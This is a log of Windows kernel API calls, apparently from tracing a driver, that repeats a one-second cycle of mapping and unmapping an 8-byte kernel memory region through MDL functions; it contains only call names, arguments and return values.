| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c2c9560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2c9560, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c31f560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c31f560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c375560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c375560, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c591560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c591560, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d1b2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d1b2560, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d1e4560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d1e4560, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d8ee560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d8ee560, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e480560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e480560, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e513560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e513560, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e8b2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e8b2560, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002f473560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f473560, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002f520560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f520560, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002f675560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f675560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002f6f6560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f6f6560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00033c27560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00033c27560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0003579e560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0003579e560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00049b9d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049b9d560, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0004a72f560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0004a72f560, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd000291ae560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd000291ae560, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b4458b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b4458b0, MemoryDescriptorList_unk_out = 0xffffe0003b4458b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b4458b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029408560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029408560, MemoryDescriptorList_unk = 0xffffe0003b4458b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b4458b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002987d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002987d560, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae91d10 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae91d10, MemoryDescriptorList_unk_out = 0xffffe0003ae91d10 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae91d10, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029898560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029898560, MemoryDescriptorList_unk = 0xffffe0003ae91d10 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae91d10 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae679b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae679b0, MemoryDescriptorList_unk_out = 0xffffe0003ae679b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae679b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029aa7560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029aa7560, MemoryDescriptorList_unk = 0xffffe0003ae679b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae679b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bc64010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bc64010, MemoryDescriptorList_unk_out = 0xffffe0003bc64010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bc64010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029aae560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029aae560, MemoryDescriptorList_unk = 0xffffe0003bc64010 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bc64010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461f8db0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461f8db0, MemoryDescriptorList_unk_out = 0xffffe000461f8db0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461f8db0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029dcd560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029dcd560, MemoryDescriptorList_unk = 0xffffe000461f8db0 |
| IoFreeMdl | Mdl_unk = 0xffffe000461f8db0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029ddc560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029ddc560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a060560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a060560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a077560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a077560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c351920 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c351920, MemoryDescriptorList_unk_out = 0xffffe0003c351920 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c351920, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002a07f560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a07f560, MemoryDescriptorList_unk = 0xffffe0003c351920 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c351920 |
